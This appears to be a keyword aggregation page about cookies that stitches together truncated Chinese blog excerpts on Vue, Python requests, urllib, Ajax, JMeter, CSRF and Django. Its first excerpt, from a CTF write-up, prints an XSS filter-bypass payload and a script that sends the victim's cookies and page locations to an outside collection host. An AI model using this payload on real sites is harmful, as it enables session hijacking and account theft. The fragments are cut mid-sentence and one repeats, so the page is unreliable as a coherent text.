cookie

以前一直没做过xss的题，这次按writeup做题感觉有所收获，记录一下吧 xss 的waf的绕过 ()都被过滤，把所有的payload转为 HTML Markup ，其实就是&#加ascii码 payload <svg><script>eval&#40&#34" + output + "&#34&#41</script> output就是下面的东西转化为HTML Markup编码的东西，这是XSS Platform这个平台自带的payload，一开始没看懂，整理一下代码格式 (function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0 &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+ '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+ '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+ '

项目功能插件 1、vue-router { path: '/', name: 'home', // 路由的重定向 redirect: '/home' } { // 一级路由, 在根组件中被渲染, 替换根组件的<router-view/>标签 path: '/one-view', name: 'one', component: () => import('./views/OneView.vue') } { // 多级路由, 在根组件中被渲染, 替换根组件的<router-view/>标签 path: '/one-view/one-detail', component: () => import('./views/OneDetail.vue'), // 子路由, 在所属路由指向的组件中被渲染, 替换该组件(OneDetail)的<router-view/>标签 children: [{ path: 'show', component: () => import('./components/OneShow.vue') }] } <!-- router-link渲染为a标签 --> <router-link to="/">Home</router-link> | <router-link to="/about">About</router-link> | <router-link :to=

vue之vue-cookies 安装： npm install vue-cookies --save 使用： import Vue from 'Vue' import VueCookies from 'vue-cookies' Vue.use(VueCookies) Api： 　　设置 cookie： this.$cookies.set(keyName, time) //return this 　　获取cookie this.$cookies.get(keyName) // return value 　　删除 cookie this.$cookies.remove(keyName) // return false or true , warning： next version return this； use isKey(keyname) return true/false,please 　　查看一个cookie是否存在（通过 keyName ） this.$cookies.isKey(keyName) // return false or true 　　获取所有cookie名称 this.$cookies.keys() // return a array 来源： https://www.cnblogs.com/liuqingzheng/articles/9850874.html

目录 python中requests库使用方法详解 官方文档 什么是Requests 安装Requests库 基本的GET请求 带参数的GET请求 解析json 添加headers 基本POST请求 响应 response属性 高级操作 获取cookie 会话维持、模拟登陆 证书验证(SSL Cert Verification) 认证设置 代理设置 超时设置 异常处理 上传文件 带参数的GET请求->headers 带参数的GET请求->cookies 发送post请求，模拟浏览器的登录行为 补充json python中requests库使用方法详解 官方文档 requests的具体安装过程请看：http://docs.python-requests.org/en/latest/user/install.html#install requests的官方指南文档：http://docs.python-requests.org/en/latest/user/quickstart.html requests的高级指南文档：http://docs.python-requests.org/en/latest/user/advanced.html#advanced 什么是Requests Requests 是⽤ ython语⾔编写，基于urllib，采⽤Apache2

目录 python 之 Urllib库的基本使用 官方文档 什么是Urllib urlopen url参数的使用 data参数的使用 timeout参数的使用 响应 响应类型、状态码、响应头 request 异常处理 URL解析 功能一： urlunpars urljoin urlencode python 之 Urllib库的基本使用 官方文档 https://docs.python.org/3/library/urllib.html 什么是Urllib Urllib是python内置的HTTP请求库 包括以下模块 urllib.request 请求模块 urllib.error 异常处理模块 urllib.parse url解析模块 urllib.robotparser robots.txt解析模块 urlopen 关于urllib.request.urlopen参数的介绍： urllib.request.urlopen(url, data=None, [timeout, ]*, cafile=None, capath=None, cadefault=False, context=None) url参数的使用 先写一个简单的例子： import urllib.request response = urllib.request.urlopen('http://www.baidu

1.Ajax AJAX = Asynchronous JavaScript and XML（异步 JavaScript 和 XML）。 Ajax 的原理简单来说通过 XmlHttpRequest 对象来向服务器发异步请求，从服务器获得数据，然后用 Javascript 来操作 DOM 而更新页面。这其中最关键的一步就是从服务器获得请求数据。 XmlHttpRequest 是 ajax 的核心机制，它是在 IE5 中首先引入的，是一种支持异步请求的技术。简单的说，也就是 Javascript 可以及时向服务器提出请求和处理响应，而不阻塞用户。达到无刷新的效果 image.png 2.JQuery JQuery 是一个 JavaScript 库。功能包括 HTML 元素选取和操作、CSS 操作、HTML 事件函数、 JavaScript 特效和动画、HTML DOM 遍历和修改、AJAX 和 Utilities。除此之外，JQuery 还提供了大量插件。 基础语法： $(selector).action()。 选择器：主要分四大选择器，分别是基本选择器、层次选择器、过滤选择器、属性过滤选择器。 事件：例如 click()、dblclick()、mouseenter()、mouseleave()、mousedown()等。 3.Cookie 在 web 程序中是使用 HTTP

通过调用接口，对服务器产生压力，单接口测试，会遇到响应数据返回的是要求先登录。这是我们在调用这个接口时，根据业务逻辑，必须先登录才可以，比如：提交订单，那么就需要先获取用户登录的cookie，然后再把该cookie作为提交订单接口的请求头信息。 下面详细介绍下，在jmeter上如何实现提取登录cookie。 1、首先在登录请求下添加后置处理器--正则表达式提取器，根据具体的响应数据，写正则表达式去提取。 提取到的结果是否正确，添加Debug PostProcessor，去调试。 正则表达式提取器页面解释： 引用名称，就是后面要实际引用到的名称，可以自己定义。 正则表达式的写法，其中 . 表示匹配任意字符串 * 表示匹配任意多次 ? 表示找到匹配项就停止 模板，就是上面的正则表达式中想要提取哪个内容（可能会有多个正则表达式），$1$表示提取第一个括号里的内容。 匹配数字，就是匹配到的第几项，0代表随机，-1代表匹配到的全部项，1代表匹配到的第一项，2代表匹配到的第二项，以此类推 2、在具体需要携带cookie的请求下面添加“HTTP Cookie 管理器”，然后把从登录中获取到的cookie参数化进来。如图： 这样就可以成功的发送短信了，不会再出现先登录的情况了。 来源： https://www.cnblogs.com/jane4321/p/11859351.html

项目功能插件 1、vue-router { path: '/', name: 'home', // 路由的重定向 redirect: '/home' } { // 一级路由, 在根组件中被渲染, 替换根组件的<router-view/>标签 path: '/one-view', name: 'one', component: () => import('./views/OneView.vue') } { // 多级路由, 在根组件中被渲染, 替换根组件的<router-view/>标签 path: '/one-view/one-detail', component: () => import('./views/OneDetail.vue'), // 子路由, 在所属路由指向的组件中被渲染, 替换该组件(OneDetail)的<router-view/>标签 children: [{ path: 'show', component: () => import('./components/OneShow.vue') }] } <!-- router-link渲染为a标签 --> <router-link to="/">Home</router-link> | <router-link to="/about">About</router-link> | <router-link :to=

一、CSRF介绍 CSRF（Cross-site request forgery） 跨站请求伪造，也被称为“OneClick Attack”或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。 CSRF攻击与防御，web安全的第一防线（源码，实战，5分钟科普文） 上图为CSRF攻击的一个简单模型，用户访问恶意网站B，恶意网站B返回给用户的HTTP信息中要求用户访问网站A，而由于用户和网站A之间可能已经有信任关系导致这个请求就像用户真实发送的一样会被执行。 二、CSRF攻击的危害 攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。 如果CSRF发送的垃圾信息还带有蠕虫链接的话，那些接收到这些有害信息的好友万一打开私信中的连接就也成为了有害信息的散播着，这样数以万计的用户被窃取了资料种植了木马。整个网站的应用就可能在瞬间奔溃，用户投诉，用户流失，公司声誉一落千丈甚至面临倒闭。曾经在MSN上，一个美国的19岁的小伙子Samy利用css的background漏洞几小时内让100多万用户成功的感染了他的蠕虫，虽然这个蠕虫并没有破坏整个应用，只是在每一个用户的签名后面都增加了一句“Samy

cookie cookie的由来 http协议是无状态的，犹如人生若只如初见，每次都是初次。由此我们需要cookie来保持状态，保持客户端和服务端的数据通信。 什么是cookie Cookie具体指的是一段小信息，它是服务器发送出来存储在浏览器上的一组组键值对，下次访问服务器时浏览器会自动携带这些键值对，以便服务器提取有用信息。 cookie原理 cookie的工作原理是：由服务器产生内容，浏览器收到请求后保存在本地；当浏览器再次访问时，浏览器会自动带上Cookie，这样服务器就能通过Cookie的内容来判断这个是“谁”了。 查看cookie Django中操作cookie 获取cookie request.COOKIES['key'] request.get_signed_cookie(key, default=RAISE_ERROR, salt='', max_age=None) 参数： default: 默认值 salt: 加密盐 max_age: 后台控制过期时间 设置cookie rep = HttpResponse(...) rep ＝ render(request, ...) rep.set_cookie(key,value,...) rep.set_signed_cookie(key,value,salt='加密盐', max_age=None, ...) 参数：